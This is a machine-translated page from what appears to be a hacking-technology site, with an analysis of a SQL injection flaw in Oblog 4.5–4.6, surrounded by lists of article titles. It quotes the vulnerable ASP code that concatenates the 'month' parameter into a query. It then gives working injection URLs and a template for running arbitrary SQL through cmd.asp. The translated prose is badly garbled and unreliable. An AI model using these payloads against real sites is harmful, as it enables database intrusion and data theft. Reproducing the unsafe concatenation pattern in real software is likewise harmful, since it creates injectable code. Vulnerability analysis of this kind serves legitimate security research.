Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > crack analyzes > Content
Hot Articles
GE-Fanuc CIMPLICITY w32r
CA BrightStor ARCserve B
Apple iPhone Passcode Lo
Apple iPhone Passcode Lo
BitTorrent and uTorrent
FoosunCMS Sql Injection
KMail password encryptio
Rainbow awareness tool t
IE7 0Day crack analysis
Roams through three secu
Discuz! NT 2.5 pour into
Cracking the password pr
Ghost has the crack mirr
phpinfo cross station sc
Tomcat crack's analysis
Recommend Articles
Roams through three secu
FoosunCMS Sql Injection
In PHPCMS2.4 an interest
World browser local xss
Z-blog cross station scr
About XSS crack another
hzhost hypothesized main
php the escapeshellcmd m
Thunderclap ActiveX cont
360 security browser loc
The third party browser
The careful character re
Maxthon roams through br
Yahoo! Statistical funct
Using sohu website URL s
New Articles
The H?to half of all mal
Capital protects eyes cr
Agents of the secret net
fingerPIN launches multi
Tips to supply household
OCS Resolution Security
Spyware attacks tripled
Drink and drug driving c
Forgot your password?has
PKWARE PartnerLink membe
Masternaut provides live
Troj / Erazer-A Trojan i
Hacker of 21?Years old,
Free Firefox anti-phishi
Cyber-criminals are not
Oblog pours into the crack to analyze (already patching) most newly
  Add date: 08/08/2008   Publishing date: 08/08/2008   Hits: 9
Date:2008-5-15 Author:Yamato[BCT] Version:Oblog 4.5-4.6 sql code analysis: Document In/Class_UserCommand.asp: strMonth=Request (“month”) // 63rd line of strDay=Request (“day”) ...... Case “month” // 84th line of Dim LastDay G_P_FileName = G_P_FileName & “month&month=” & strMonth strDay=Left(strMonth,4) &” - “& Right(strMonth,2) &” - 01 " mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr (“01,03,05,07,08,10,12”, mMonth) > 0 Then LastDay = “31” ...... Else // 109th line of SqlPart =” And Addtime >='"&strMonth& " 01 ' AND Addtime < '“&strMonth&LastDay&” '” structure appropriate variable strMonth carries on the injection test method: http://localhost/oblog/cmd.asp?do= month&month=2008' and user>0--01 strDay variables obtain the date data from month, and judges strDay whether is the date data. Therefore the structure injection sentence is: http://localhost/oblog/cmd.asp?do= month&month=2008'(own sql sentence)--01 carry out the sql sentence to use rst. Open strSql, Conn,1,1 cannot revise the record compendium.

Prev:To Extmail security crack's analysis Next:Mozilla the mail client side MIME exterior main body piles the overflow crack

Comment:

Category: Home > crack analyzes
Home